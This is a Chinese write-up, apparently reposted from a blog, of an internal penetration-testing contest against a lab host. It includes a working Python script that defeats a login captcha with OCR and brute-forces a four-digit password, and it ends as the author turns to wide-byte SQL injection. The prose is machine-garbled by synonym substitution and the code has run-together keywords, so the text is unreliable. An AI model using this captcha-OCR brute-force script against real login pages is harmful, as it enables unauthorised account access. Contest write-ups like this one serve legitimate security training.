某安适团队内部渗透角逐记录 8090安适门户
第一节:
title:进入192.168.1.6 获取秘匙。
ps: 跟 192.168.1.6是事情区
规程:渗透过程不得使用nmap等扫描端口工具,越发不能使用WEB扫描器。(只要有关于爬虫都不行 or 扫描owasp top 10 appsan wvs burp)除非工具是你小我私家写的。 越发不成以作弊:好比 ip斗嘴,中间人打击。请连结好小我私家本质。出格注意:全过程中不得求助增援,只能靠小我私家实力,为了防备作弊全过程需要屏幕录像。
打开 提示没权限访谒。。。
预计做了白名单验证。。。
然而: 是可以访谒的。
简单收集下信息:
[200] Apache[2.4.7], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.1.7], Index-Of, Title[Index of /]
提示说:暗码 4位int暗码。
我一开始想到了暗码爆破 至于验证码嘛 必定是存在session没更新导致验证码复用的缝隙,但是颠末测试发明这个缝隙不存在。
所以独一的步伐就是写验证码识别。。
分析一下验证码的 锚点 跟 滋扰线,以及模糊度 等。
颠末分析如果要让措施识别这种验证码等话告成率概略有90%。
# coding=utf-8
importrequests,pytesseract,os,time,re;
fromPILimportImage
cookie = {'PHPSESSID': 'e5n02iaupp5kbctejsn4i536m9'}
for inttin xrange(1000,9999):
r = requests.get('http://www.liuyan.com/3.php',cookies=cookie) # 发送请求
l = open('./3.png', 'w+')
l.write(r.content);
l.flush();
os.fsync(l);
l.close();
if os.path.isfile('3.png') :
Image.open('3.png')
image = Image.open('3.png')
vcode = pytesseract.image_to_string(image)
canshu = {'act': 'post', 'password': intt ,'Verification':vcode}
r = requests.post('http://www.liuyan.com/1.php',data=canshu,cookies=cookie)
html = r.text.encode('utf-8');
r = r"No,passworld";
if re.findall(r,html) :
print 'NO ,passwd: %i' % (intt);
else:
print 'YES ,passwd: %i' % (intt);
break
time.sleep(0.05);
[Bash shell] 纯文本检察 复制代码
暗码 1115
然后进入到这个页面:
一直想不大白这是干嘛的。单引号也没报错。然后经用失js。。
然后看到了这个:
应该是输出字符串之后就跳转了 导致看不到这个信息,再想他给我提示这个干啥?难到sql注入?
看到了单引号被转义只能把注意力放到后台那边:
爆破了好久都没功效。。浪费了一堆时间,收集了出题官的手机啥的爆破都没功效。。
虽然单引号被转义了。但我俄然又想到了宽字节注入。。。
温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12571.html